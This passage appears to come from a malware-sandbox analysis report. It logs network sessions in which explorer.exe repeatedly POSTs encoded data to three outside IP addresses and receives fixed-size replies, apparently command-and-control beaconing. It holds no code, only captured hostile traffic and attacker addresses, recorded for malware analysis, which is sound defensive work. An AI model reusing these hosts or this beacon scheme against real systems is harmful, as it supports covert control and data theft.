                                                                              2024-07-27 12:54:37 UTC1267OUTData Raw: 70 62 69 61 30 67 4c 32 33 4c 64 39 49 36 72 63 62 62 7a 70 48 58 62 76 73 4a 62 6d 6e 35 66 61 6b 53 59 66 6d 73 46 37 30 35 48 4a 6f 34 78 4b 47 37 78 30 38 77 75 61 6d 69 44 75 47 63 51 54 2b 71 7a 67 32 57 38 76 5a 34 53 6a 49 47 30 5a 77 4a 74 36 32 6a 79 6f 38 65 54 79 31 31 43 41 6d 6a 71 67 41 73 48 31 6e 67 50 62 6f 57 30 48 42 55 78 37 68 4f 48 4c 75 6b 6b 49 66 49 52 6d 30 43 7a 33 42 50 64 73 74 49 63 30 54 67 36 74 37 33 50 67 4e 48 41 38 32 33 4c 63 44 6b 36 64 65 52 6f 6f 4e 76 32 34 39 54 39 79 67 70 6e 50 47 47 46 4c 37 6f 46 64 32 45 78 61 4a 6a 44 35 43 6c 69 30 4b 2f 75 4a 63 49 51 4f 77 61 63 53 52 59 4a 5a 71 42 4f 48 2f 73 44 71 59 43 4d 69 71 6a 46 36 51 78 73 59 49 4f 66 4c 59 52 79 68 6f 42 78 79 66 55 41 71 52 6a 64 55 61 66 78
                                                                              Data Ascii: pbia0gL23Ld9I6rcbbzpHXbvsJbmn5fakSYfmsF705HJo4xKG7x08wuamiDuGcQT+qzg2W8vZ4SjIG0ZwJt62jyo8eTy11CAmjqgAsH1ngPboW0HBUx7hOHLukkIfIRm0Cz3BPdstIc0Tg6t73PgNHA823LcDk6deRooNv249T9ygpnPGGFL7oFd2ExaJjD5Cli0K/uJcIQOwacSRYJZqBOH/sDqYCMiqjF6QxsYIOfLYRyhoBxyfUAqRjdUafx
                                                                              2024-07-27 12:54:39 UTC137INHTTP/1.1 200 OK
                                                                              Content-Length: 685
                                                                              Date: Sat, 27 Jul 2024 12:54:39 GMT
                                                                              Content-Type: text/plain; charset=utf-8
                                                                              Connection: close
                                                                              2024-07-27 12:54:39 UTC685INData Raw: 75 70 6a 41 6a 64 68 49 47 35 53 62 67 2b 54 49 54 7a 76 65 6e 32 48 42 57 70 51 45 4b 71 41 69 32 45 42 4a 78 41 6b 48 4b 5a 6b 73 4c 77 70 37 4e 36 6f 41 4a 39 4d 54 30 7a 6f 33 68 42 7a 37 63 36 39 56 45 76 5a 68 52 36 69 52 34 32 6c 44 55 37 4b 59 2b 56 76 32 32 6a 34 4a 38 52 77 57 72 56 4e 2b 78 6d 74 35 46 52 63 42 72 70 4e 70 47 76 44 4f 58 49 66 78 4d 75 62 69 49 6d 44 4f 6e 69 4b 4e 2b 39 50 2f 34 43 4d 56 63 54 56 31 41 54 76 6b 33 39 7a 4d 78 72 59 57 6a 2f 68 47 56 75 72 56 6f 67 59 2b 55 49 4a 73 2b 4b 4e 72 73 70 5a 39 67 6f 39 37 58 45 73 59 77 5a 59 53 6e 43 35 6a 6b 68 5a 51 52 6d 6e 33 37 7a 49 69 31 69 35 49 39 45 33 50 2b 79 74 50 2f 71 75 6b 4d 35 7a 33 78 54 34 72 41 71 34 6e 33 78 63 46 32 75 64 2b 36 30 72 73 36 38 48 70 38 34 5a
                                                                              Data Ascii: upjAjdhIG5Sbg+TITzven2HBWpQEKqAi2EBJxAkHKZksLwp7N6oAJ9MT0zo3hBz7c69VEvZhR6iR42lDU7KY+Vv22j4J8RwWrVN+xmt5FRcBrpNpGvDOXIfxMubiImDOniKN+9P/4CMVcTV1ATvk39zMxrYWj/hGVurVogY+UIJs+KNrspZ9go97XEsYwZYSnC5jkhZQRmn37zIi1i5I9E3P+ytP/qukM5z3xT4rAq4n3xcF2ud+60rs68Hp84Z


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              55192.168.2.449824167.235.128.1534432580C:\Windows\explorer.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-07-27 12:54:39 UTC234OUTPOST / HTTP/1.1
                                                                              Host: 167.235.128.153
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                              Connection: close
                                                                              Content-Type: text/plain
                                                                              Content-Length: 1122
                                                                              2024-07-27 12:54:39 UTC1122OUTData Raw: 61 59 33 39 32 51 51 35 71 38 6f 37 31 73 2f 45 2f 68 4c 41 50 36 6c 73 66 64 30 4e 54 59 64 62 30 4f 54 77 33 58 70 2f 69 53 75 4e 34 76 50 62 78 59 53 68 35 41 30 74 67 79 72 43 4f 68 49 53 50 69 4a 76 68 41 2f 75 6c 49 5a 57 73 44 75 76 47 66 39 2b 56 33 55 71 6c 61 74 5a 42 4e 73 75 50 6c 32 4c 68 58 42 6c 5a 57 7a 46 4f 59 5a 63 50 6b 45 4d 4e 72 68 56 59 7a 32 49 4a 34 38 76 76 6e 70 44 75 35 48 78 62 69 4c 64 39 7a 44 56 53 51 54 6b 6e 4a 58 37 4b 32 62 31 6f 36 76 6d 33 6c 34 49 65 35 43 7a 75 77 42 41 2b 50 4b 75 79 54 42 44 48 73 33 34 77 75 69 33 55 6a 30 56 4a 67 56 65 69 31 77 44 74 6f 73 4b 61 69 4b 4d 43 4c 48 4b 52 72 64 7a 4f 6e 56 70 32 30 4e 53 41 79 43 34 6c 72 47 56 6e 41 51 6d 65 36 6e 35 68 4e 34 75 37 50 47 37 47 6a 6a 6a 4e 58 65
                                                                              Data Ascii: aY392QQ5q8o71s/E/hLAP6lsfd0NTYdb0OTw3Xp/iSuN4vPbxYSh5A0tgyrCOhISPiJvhA/ulIZWsDuvGf9+V3UqlatZBNsuPl2LhXBlZWzFOYZcPkEMNrhVYz2IJ48vvnpDu5HxbiLd9zDVSQTknJX7K2b1o6vm3l4Ie5CzuwBA+PKuyTBDHs34wui3Uj0VJgVei1wDtosKaiKMCLHKRrdzOnVp20NSAyC4lrGVnAQme6n5hN4u7PG7GjjjNXe
                                                                              2024-07-27 12:54:41 UTC137INHTTP/1.1 200 OK
                                                                              Content-Length: 685
                                                                              Date: Sat, 27 Jul 2024 12:54:40 GMT
                                                                              Content-Type: text/plain; charset=utf-8
                                                                              Connection: close
                                                                              2024-07-27 12:54:41 UTC685INData Raw: 4a 47 75 4c 6b 68 2b 53 56 63 77 35 4e 68 2f 6f 49 70 7a 57 59 51 69 2f 56 7a 46 32 72 2f 34 66 72 48 61 31 6f 5a 47 4b 53 6f 32 38 4e 79 46 44 71 69 2f 49 56 75 4f 6d 6a 75 58 71 74 59 46 47 42 6d 34 45 65 6f 56 35 6c 64 55 45 48 67 51 6c 37 76 33 31 77 78 62 79 54 6e 64 57 65 70 4b 73 66 43 2b 53 75 32 76 33 76 69 57 4b 67 5a 63 49 33 6b 32 59 76 6d 48 6e 48 79 4d 39 72 45 42 7a 44 74 2f 65 41 4e 44 30 62 77 75 6e 2b 76 58 79 35 2f 4c 34 33 7a 61 76 6d 4f 6b 70 52 6c 56 54 6f 53 49 42 78 77 53 69 71 53 55 31 77 4b 41 76 78 6f 41 46 2b 59 43 64 73 45 4c 2f 52 6b 51 2f 2b 4b 6f 59 42 44 4b 33 56 4a 5a 78 64 76 34 35 63 56 6f 63 51 64 34 48 4c 37 61 72 56 30 4e 42 6e 4a 4c 44 31 36 65 49 58 44 6c 2f 57 32 69 6e 69 43 7a 38 43 45 57 38 79 67 44 31 57 70 5a
                                                                              Data Ascii: JGuLkh+SVcw5Nh/oIpzWYQi/VzF2r/4frHa1oZGKSo28NyFDqi/IVuOmjuXqtYFGBm4EeoV5ldUEHgQl7v31wxbyTndWepKsfC+Su2v3viWKgZcI3k2YvmHnHyM9rEBzDt/eAND0bwun+vXy5/L43zavmOkpRlVToSIBxwSiqSU1wKAvxoAF+YCdsEL/RkQ/+KoYBDK3VJZxdv45cVocQd4HL7arV0NBnJLD16eIXDl/W2iniCz8CEW8ygD1WpZ


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              56192.168.2.449825107.173.160.1374432580C:\Windows\explorer.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-07-27 12:54:41 UTC234OUTPOST / HTTP/1.1
                                                                              Host: 107.173.160.137
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                              Connection: close
                                                                              Content-Type: text/plain
                                                                              Content-Length: 1122
                                                                              2024-07-27 12:54:41 UTC1122OUTData Raw: 48 2f 64 64 67 2b 6e 37 51 4a 49 72 6c 55 79 55 72 43 69 39 78 37 6c 61 45 54 63 46 43 35 58 53 77 73 66 39 2b 75 34 2f 66 45 67 36 34 61 41 77 76 2b 41 30 57 47 34 38 56 64 2b 43 4b 4f 37 77 4b 54 76 6f 36 74 79 78 39 64 51 51 6e 51 78 53 43 72 51 63 4c 4c 56 76 6f 52 4a 4c 35 4a 7a 2b 70 48 65 74 59 36 41 32 74 49 4e 4e 2b 4b 56 47 76 51 45 45 54 67 36 74 56 37 53 2f 52 30 62 2b 4a 2b 31 72 6d 42 4d 4b 6b 4b 6f 5a 41 37 6a 68 6f 42 43 30 2b 57 41 67 72 4f 77 37 79 47 35 71 46 4f 4e 68 6a 53 75 46 4f 79 76 41 4d 50 48 72 4f 4d 67 6e 7a 67 51 50 6f 51 6c 73 6d 31 37 4b 79 54 5a 6f 67 4c 48 76 62 6e 50 53 73 33 73 6b 50 4c 4d 31 76 6e 53 33 64 56 77 41 57 6b 79 37 75 34 6e 39 42 48 41 70 59 62 58 67 61 59 6c 55 71 36 57 58 54 43 50 48 57 6d 2b 56 58 6d 4b
                                                                              Data Ascii: H/ddg+n7QJIrlUyUrCi9x7laETcFC5XSwsf9+u4/fEg64aAwv+A0WG48Vd+CKO7wKTvo6tyx9dQQnQxSCrQcLLVvoRJL5Jz+pHetY6A2tINN+KVGvQEETg6tV7S/R0b+J+1rmBMKkKoZA7jhoBC0+WAgrOw7yG5qFONhjSuFOyvAMPHrOMgnzgQPoQlsm17KyTZogLHvbnPSs3skPLM1vnS3dVwAWky7u4n9BHApYbXgaYlUq6WXTCPHWm+VXmK
                                                                              2024-07-27 12:54:43 UTC137INHTTP/1.1 200 OK
                                                                              Content-Length: 685
                                                                              Date: Sat, 27 Jul 2024 12:54:43 GMT
                                                                              Content-Type: text/plain; charset=utf-8
                                                                              Connection: close
                                                                              2024-07-27 12:54:43 UTC685INData Raw: 6e 67 46 5a 64 30 75 51 30 73 43 32 50 42 45 57 37 54 33 4e 38 7a 57 59 62 6e 68 4a 59 50 6a 48 37 75 70 39 6a 47 44 74 57 79 63 2f 76 42 31 4a 47 34 39 67 36 66 64 51 75 77 54 31 54 68 46 6f 74 67 35 51 4c 7a 31 6a 4f 52 51 64 55 47 32 6e 6c 37 50 37 64 41 35 61 69 32 47 4b 56 44 75 33 34 52 54 50 44 51 50 46 62 2b 4a 53 2b 65 52 57 66 66 75 65 68 42 79 35 7a 56 30 4f 32 47 6b 45 59 76 62 72 6b 79 6e 6c 6a 76 4e 45 52 6e 73 4a 41 44 78 6d 6a 4d 31 2f 33 78 61 78 54 62 5a 4e 42 6b 6d 39 62 38 47 72 2b 6f 6e 67 49 4f 46 4e 65 35 2f 56 6d 47 50 36 37 66 78 51 32 41 4c 6c 6f 38 73 42 43 75 69 59 33 4e 69 4d 43 6a 42 54 7a 69 66 31 50 47 64 43 70 6b 6a 59 2f 2f 44 56 2b 6b 52 61 35 4b 2b 69 53 7a 4c 54 47 51 7a 72 39 44 33 2f 35 67 54 70 62 52 50 47 32 69 2b
                                                                              Data Ascii: ngFZd0uQ0sC2PBEW7T3N8zWYbnhJYPjH7up9jGDtWyc/vB1JG49g6fdQuwT1ThFotg5QLz1jORQdUG2nl7P7dA5ai2GKVDu34RTPDQPFb+JS+eRWffuehBy5zV0O2GkEYvbrkynljvNERnsJADxmjM1/3xaxTbZNBkm9b8Gr+ongIOFNe5/VmGP67fxQ2ALlo8sBCuiY3NiMCjBTzif1PGdCpkjY//DV+kRa5K+iSzLTGQzr9D3/5gTpbRPG2i+


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              57192.168.2.449826107.173.160.1394432580C:\Windows\explorer.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-07-27 12:54:43 UTC234OUTPOST / HTTP/1.1
                                                                              Host: 107.173.160.139
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                              Connection: close
                                                                              Content-Type: text/plain
                                                                              Content-Length: 1267
                                                                              2024-07-27 12:54:43 UTC1267OUTData Raw: 71 38 56 4a 31 51 77 33 69 37 53 57 37 50 6e 53 62 57 4a 4e 44 73 6f 34 31 78 7a 4e 73 45 6f 4f 61 75 50 68 55 39 33 72 5a 46 2f 48 38 2b 74 6b 4b 62 4c 7a 68 72 31 69 47 46 35 71 4f 6d 65 70 55 4f 78 6d 35 6c 33 4e 52 65 2f 69 77 79 64 33 53 33 64 55 35 31 6b 59 71 76 75 58 47 4a 32 76 49 71 4b 73 45 2b 39 68 4f 44 54 77 63 30 49 71 67 65 4d 33 6b 70 4d 69 57 31 43 59 42 74 4b 6e 48 54 71 6e 72 4d 70 4d 6e 47 2b 55 68 79 61 39 6b 45 72 68 2b 50 5a 59 72 53 32 38 4d 6b 72 77 35 63 52 4a 52 6f 69 51 75 77 45 52 65 68 39 55 2b 4d 34 49 4d 6b 31 4e 75 66 66 32 59 42 6f 73 77 34 6d 50 38 63 6c 6b 63 6a 32 44 37 63 35 57 33 78 2b 64 6b 54 2f 45 52 30 4b 64 66 39 48 48 6d 6f 66 4f 2b 79 51 56 36 49 36 7a 74 73 55 33 73 41 39 70 71 6b 35 48 58 53 72 71 4f 63 53
                                                                              Data Ascii: q8VJ1Qw3i7SW7PnSbWJNDso41xzNsEoOauPhU93rZF/H8+tkKbLzhr1iGF5qOmepUOxm5l3NRe/iwyd3S3dU51kYqvuXGJ2vIqKsE+9hODTwc0IqgeM3kpMiW1CYBtKnHTqnrMpMnG+Uhya9kErh+PZYrS28Mkrw5cRJRoiQuwEReh9U+M4IMk1Nuff2YBosw4mP8clkcj2D7c5W3x+dkT/ER0Kdf9HHmofO+yQV6I6ztsU3sA9pqk5HXSrqOcS
                                                                              2024-07-27 12:54:44 UTC137INHTTP/1.1 200 OK
                                                                              Content-Length: 685
                                                                              Date: Sat, 27 Jul 2024 12:54:44 GMT
                                                                              Content-Type: text/plain; charset=utf-8
                                                                              Connection: close
                                                                              2024-07-27 12:54:44 UTC685INData Raw: 50 4f 69 30 45 39 52 64 74 6b 59 75 6e 36 67 39 32 70 47 59 65 47 79 63 66 70 74 48 54 61 67 69 4e 2b 4c 62 6b 74 73 57 57 52 75 45 49 58 6e 6a 51 4c 67 41 62 6c 6b 33 7a 4e 56 53 78 4a 6a 36 63 51 33 39 70 4e 51 37 4e 62 74 36 4a 71 36 70 67 49 4d 36 36 66 75 63 67 4e 56 34 38 35 65 69 4f 52 48 71 31 69 59 6d 4f 66 4b 67 36 74 69 58 6e 52 6b 2f 52 57 79 72 6b 6a 41 4e 66 61 53 6c 73 46 35 68 51 69 30 37 64 31 2f 63 47 6c 61 7a 49 7a 30 43 53 5a 6f 33 46 65 43 30 54 56 4f 51 79 71 5a 59 59 67 76 49 76 6c 70 4a 54 34 63 52 64 63 59 79 6a 53 47 4d 6f 6d 66 6e 37 34 58 74 74 53 34 62 6d 38 57 58 4f 30 53 47 70 33 37 6c 69 33 4b 74 4a 41 75 72 33 66 4f 74 43 39 64 73 70 46 35 68 63 78 4e 65 35 55 4a 75 58 45 78 38 44 34 4d 47 6a 2f 6b 73 44 43 6d 45 5a 6e 7a
                                                                              Data Ascii: POi0E9RdtkYun6g92pGYeGycfptHTagiN+LbktsWWRuEIXnjQLgAblk3zNVSxJj6cQ39pNQ7Nbt6Jq6pgIM66fucgNV485eiORHq1iYmOfKg6tiXnRk/RWyrkjANfaSlsF5hQi07d1/cGlazIz0CSZo3FeC0TVOQyqZYYgvIvlpJT4cRdcYyjSGMomfn74XttS4bm8WXO0SGp37li3KtJAur3fOtC9dspF5hcxNe5UJuXEx8D4MGj/ksDCmEZnz


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              58192.168.2.449828167.235.128.1534432580C:\Windows\explorer.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-07-27 12:54:45 UTC234OUTPOST / HTTP/1.1
                                                                              Host: 167.235.128.153
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                              Connection: close
                                                                              Content-Type: text/plain
                                                                              Content-Length: 1122
                                                                              2024-07-27 12:54:45 UTC1122OUTData Raw: 46 37 4b 5a 67 2f 33 65 47 34 52 56 4a 64 38 59 6b 6f 32 33 50 56 70 42 36 56 64 54 46 67 6f 57 72 54 37 70 72 66 74 43 34 50 4d 49 4a 66 41 44 36 70 38 6f 35 66 48 4a 6e 4e 4f 6f 30 34 7a 56 32 61 68 35 59 70 48 68 2b 54 67 6e 53 50 79 35 31 4a 46 67 71 53 63 47 39 70 34 6a 61 35 4f 64 58 46 2b 74 62 4f 33 4b 2b 74 69 6c 4a 6f 44 65 55 46 4a 64 59 49 35 6c 63 2f 67 75 77 75 4a 33 66 5a 46 4c 55 64 74 4f 69 58 79 36 30 43 5a 72 43 55 58 54 70 74 76 38 4d 39 56 78 67 49 43 52 63 61 42 70 56 74 41 56 41 6c 32 71 53 33 4b 57 57 75 62 74 35 44 66 44 4b 66 63 39 37 35 64 63 5a 65 39 56 30 35 36 4e 72 36 61 71 45 49 6f 2b 72 48 78 4c 36 56 66 36 72 42 35 6a 44 34 74 69 59 58 64 64 65 69 36 72 38 75 52 56 31 48 2f 72 73 57 62 45 57 6e 56 58 4d 4d 48 4d 7a 32 51
                                                                              Data Ascii: F7KZg/3eG4RVJd8Yko23PVpB6VdTFgoWrT7prftC4PMIJfAD6p8o5fHJnNOo04zV2ah5YpHh+TgnSPy51JFgqScG9p4ja5OdXF+tbO3K+tilJoDeUFJdYI5lc/guwuJ3fZFLUdtOiXy60CZrCUXTptv8M9VxgICRcaBpVtAVAl2qS3KWWubt5DfDKfc975dcZe9V056Nr6aqEIo+rHxL6Vf6rB5jD4tiYXddei6r8uRV1H/rsWbEWnVXMMHMz2Q
                                                                              2024-07-27 12:54:46 UTC137INHTTP/1.1 200 OK
                                                                              Content-Length: 685
                                                                              Date: Sat, 27 Jul 2024 12:54:46 GMT
                                                                              Content-Type: text/plain; charset=utf-8
                                                                              Connection: close
                                                                              2024-07-27 12:54:46 UTC685INData Raw: 44 4f 53 38 59 35 34 6c 45 51 51 32 6d 55 56 6f 52 47 6d 63 6d 72 4f 4c 48 45 39 6b 55 30 6f 53 78 6b 43 53 6d 4f 6f 72 52 48 61 76 71 43 49 53 31 2f 41 6a 53 78 33 34 6a 41 59 35 32 34 45 49 63 65 64 31 71 37 64 39 65 4f 49 52 5a 52 78 72 30 2f 36 67 34 61 4c 78 2f 50 55 43 68 38 56 79 58 72 64 4b 56 38 6b 69 61 2b 6f 58 48 50 32 78 4b 6b 31 62 41 4d 41 4d 77 74 6d 6e 7a 36 49 2f 68 2b 50 4e 6a 6e 72 59 32 44 47 45 37 4b 34 4a 45 75 76 5a 45 41 4f 38 36 66 73 58 58 72 41 34 35 76 35 33 79 4d 72 48 36 34 61 7a 62 72 31 42 75 68 70 46 4c 38 4d 42 76 5a 76 72 49 70 76 69 51 34 38 2f 62 53 55 34 6b 6a 63 67 57 47 6c 33 59 67 55 74 53 71 6f 57 56 41 68 48 4b 33 46 72 35 67 67 7a 45 57 7a 64 49 65 79 48 41 63 34 74 52 4e 70 34 72 6d 74 50 63 7a 5a 70 46 33 49
                                                                              Data Ascii: DOS8Y54lEQQ2mUVoRGmcmrOLHE9kU0oSxkCSmOorRHavqCIS1/AjSx34jAY524EIced1q7d9eOIRZRxr0/6g4aLx/PUCh8VyXrdKV8kia+oXHP2xKk1bAMAMwtmnz6I/h+PNjnrY2DGE7K4JEuvZEAO86fsXXrA45v53yMrH64azbr1BuhpFL8MBvZvrIpviQ48/bSU4kjcgWGl3YgUtSqoWVAhHK3Fr5ggzEWzdIeyHAc4tRNp4rmtPczZpF3I


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              59192.168.2.449829107.173.160.1374432580C:\Windows\explorer.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-07-27 12:54:47 UTC234OUTPOST / HTTP/1.1
                                                                              Host: 107.173.160.137
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                              Connection: close
                                                                              Content-Type: text/plain
                                                                              Content-Length: 1122
                                                                              2024-07-27 12:54:47 UTC1122OUTData Raw: 47 62 74 74 4a 65 73 65 64 78 79 5a 66 44 4a 66 58 34 45 44 6c 4b 4b 4e 34 2f 45 72 46 65 57 4b 44 43 78 66 6a 56 43 51 67 41 55 36 78 41 76 33 73 73 50 44 61 75 36 4d 2b 48 61 64 66 34 6f 64 78 38 78 47 79 2f 5a 6c 76 44 5a 64 46 69 79 6e 32 41 4f 32 4f 72 31 6a 6a 2b 68 69 31 59 5a 36 49 70 39 6a 54 4b 64 42 4d 34 77 78 38 33 56 2b 4d 43 76 33 51 4c 5a 37 73 57 41 30 65 75 67 72 7a 4d 71 4f 53 4b 42 2f 39 47 35 2b 36 68 4e 70 51 75 49 43 75 61 51 73 55 51 4a 32 31 61 59 4d 78 46 6b 6f 6d 47 44 54 4e 39 37 45 43 73 6b 54 6c 46 6c 76 4d 4f 64 33 72 75 38 78 45 65 66 53 68 4b 2b 54 70 61 4a 4c 38 59 4c 65 6a 6b 78 57 4d 50 61 6a 37 54 71 49 74 30 47 79 42 6c 74 48 37 32 79 70 76 49 4c 4a 39 4d 45 48 65 77 64 70 6c 47 63 61 44 33 79 6f 31 4d 4a 45 58 68 70
                                                                              Data Ascii: GbttJesedxyZfDJfX4EDlKKN4/ErFeWKDCxfjVCQgAU6xAv3ssPDau6M+Hadf4odx8xGy/ZlvDZdFiyn2AO2Or1jj+hi1YZ6Ip9jTKdBM4wx83V+MCv3QLZ7sWA0eugrzMqOSKB/9G5+6hNpQuICuaQsUQJ21aYMxFkomGDTN97ECskTlFlvMOd3ru8xEefShK+TpaJL8YLejkxWMPaj7TqIt0GyBltH72ypvILJ9MEHewdplGcaD3yo1MJEXhp
                                                                              2024-07-27 12:54:48 UTC137INHTTP/1.1 200 OK
                                                                              Content-Length: 685
                                                                              Date: Sat, 27 Jul 2024 12:54:48 GMT
                                                                              Content-Type: text/plain; charset=utf-8
                                                                              Connection: close
                                                                              2024-07-27 12:54:48 UTC685INData Raw: 65 5a 4d 42 4b 57 4b 54 39 67 37 41 38 2b 42 36 4c 65 75 75 73 4f 54 42 52 53 38 4f 55 71 71 71 56 72 33 2f 6b 49 6b 71 4b 68 46 74 65 6e 76 68 50 38 6a 4e 6f 61 34 2b 44 6c 69 37 71 31 46 68 33 52 75 75 5a 39 4f 50 2b 4e 50 43 4d 70 6b 49 6c 75 30 61 76 39 2f 70 35 62 49 75 6d 36 6b 51 38 4f 59 35 34 33 63 74 4e 74 48 2b 48 6b 53 6c 35 58 65 6a 69 77 51 6e 74 55 66 6a 67 55 4b 35 62 62 4f 32 31 43 78 6e 67 37 7a 6d 68 79 75 70 56 43 33 4f 41 52 57 45 33 74 52 71 36 47 47 76 41 54 35 56 66 39 32 6a 2f 38 57 57 74 73 58 67 50 57 46 46 42 77 78 58 72 62 6e 33 31 61 71 4d 54 6e 77 70 38 69 61 7a 34 41 4d 6c 63 34 6b 57 4a 71 67 4d 30 5a 57 43 75 77 37 47 45 78 33 31 45 51 35 2f 59 63 6d 4d 76 53 49 77 44 42 6b 4b 4c 75 4a 6c 74 43 49 53 2b 36 72 67 6a 2b 52
                                                                              Data Ascii: eZMBKWKT9g7A8+B6LeuusOTBRS8OUqqqVr3/kIkqKhFtenvhP8jNoa4+Dli7q1Fh3RuuZ9OP+NPCMpkIlu0av9/p5bIum6kQ8OY543ctNtH+HkSl5XejiwQntUfjgUK5bbO21Cxng7zmhyupVC3OARWE3tRq6GGvAT5Vf92j/8WWtsXgPWFFBwxXrbn31aqMTnwp8iaz4AMlc4kWJqgM0ZWCuw7GEx31EQ5/YcmMvSIwDBkKLuJltCIS+6rgj+R


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              60192.168.2.449831107.173.160.1394432580C:\Windows\explorer.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-07-27 12:54:49 UTC234OUTPOST / HTTP/1.1
                                                                              Host: 107.173.160.139
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                              Connection: close
                                                                              Content-Type: text/plain
                                                                              Content-Length: 1267
                                                                              2024-07-27 12:54:49 UTC1267OUTData Raw: 48 43 67 50 4d 70 47 36 36 71 70 45 4c 41 31 38 65 6c 75 7a 66 75 51 4d 59 79 33 6e 52 33 34 33 47 4d 6f 6e 4a 66 69 58 67 68 50 62 6d 74 4f 53 7a 56 4c 77 4e 50 79 41 7a 42 55 4f 32 4a 79 78 65 55 4e 42 46 72 50 76 65 74 6e 37 71 6a 2b 49 4a 39 64 77 37 33 35 64 43 64 32 38 55 5a 7a 4c 44 74 6a 4e 57 67 6a 43 6f 6c 63 7a 6f 38 47 66 74 42 4b 77 46 48 51 4b 70 76 57 74 6d 4c 69 64 77 47 44 32 2f 4f 5a 4a 75 32 4f 37 59 6a 5a 66 30 57 71 77 63 51 38 38 43 78 6d 66 7a 74 53 50 2b 49 61 2f 38 6d 59 4c 54 77 33 48 41 59 37 4a 42 43 5a 50 37 2b 56 2f 6c 6a 41 36 5a 57 34 76 79 41 63 71 57 4e 37 70 61 6f 66 64 45 36 56 43 59 6e 35 77 64 47 54 65 65 62 69 70 37 65 4b 45 4a 67 51 73 63 6a 4b 31 44 6c 33 31 4f 32 76 73 4a 36 42 4f 44 4f 4a 36 46 58 50 36 39 54 68
                                                                              Data Ascii: HCgPMpG66qpELA18eluzfuQMYy3nR343GMonJfiXghPbmtOSzVLwNPyAzBUO2JyxeUNBFrPvetn7qj+IJ9dw735dCd28UZzLDtjNWgjColczo8GftBKwFHQKpvWtmLidwGD2/OZJu2O7YjZf0WqwcQ88CxmfztSP+Ia/8mYLTw3HAY7JBCZP7+V/ljA6ZW4vyAcqWN7paofdE6VCYn5wdGTeebip7eKEJgQscjK1Dl31O2vsJ6BODOJ6FXP69Th
                                                                              2024-07-27 12:54:50 UTC137INHTTP/1.1 200 OK
                                                                              Content-Length: 685
                                                                              Date: Sat, 27 Jul 2024 12:54:50 GMT
                                                                              Content-Type: text/plain; charset=utf-8
                                                                              Connection: close
                                                                              2024-07-27 12:54:50 UTC685INData Raw: 4e 76 53 79 6c 42 49 4f 6c 52 64 36 57 43 61 65 2b 49 53 33 37 4a 71 33 61 64 4c 6f 53 46 68 45 43 67 30 6b 64 30 2b 4a 7a 49 35 74 35 51 5a 52 51 36 37 79 78 61 4b 34 56 63 41 6c 66 67 55 51 49 66 32 6e 72 6a 4b 50 78 71 54 7a 37 58 73 61 4a 70 79 79 54 4f 69 56 6f 75 57 75 65 34 45 62 2b 56 56 67 74 4c 79 62 4b 63 6e 69 56 6a 78 75 68 58 47 57 69 45 78 6b 71 58 49 56 59 67 49 57 72 70 2b 67 37 58 70 79 39 69 46 41 72 4a 41 55 6a 76 58 52 35 4e 4e 37 53 58 4d 65 35 33 49 6e 6c 5a 6b 66 6a 68 41 36 79 4d 77 30 72 57 2f 4f 64 2f 4f 63 73 62 70 30 69 59 52 7a 58 63 59 45 74 6d 76 51 4e 41 30 47 42 6a 42 54 6a 54 54 52 55 6f 56 58 33 37 43 63 6e 4a 69 61 30 2f 2b 74 58 4d 37 42 69 31 32 2b 6a 34 41 38 59 33 6b 71 59 44 2b 79 68 44 63 74 46 37 78 55 64 79 51
                                                                              Data Ascii: NvSylBIOlRd6WCae+IS37Jq3adLoSFhECg0kd0+JzI5t5QZRQ67yxaK4VcAlfgUQIf2nrjKPxqTz7XsaJpyyTOiVouWue4Eb+VVgtLybKcniVjxuhXGWiExkqXIVYgIWrp+g7Xpy9iFArJAUjvXR5NN7SXMe53InlZkfjhA6yMw0rW/Od/Ocsbp0iYRzXcYEtmvQNA0GBjBTjTTRUoVX37CcnJia0/+tXM7Bi12+j4A8Y3kqYD+yhDctF7xUdyQ


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              61192.168.2.449832167.235.128.1534432580C:\Windows\explorer.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-07-27 12:54:51 UTC234OUTPOST / HTTP/1.1
                                                                              Host: 167.235.128.153
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                              Connection: close
                                                                              Content-Type: text/plain
                                                                              Content-Length: 1122
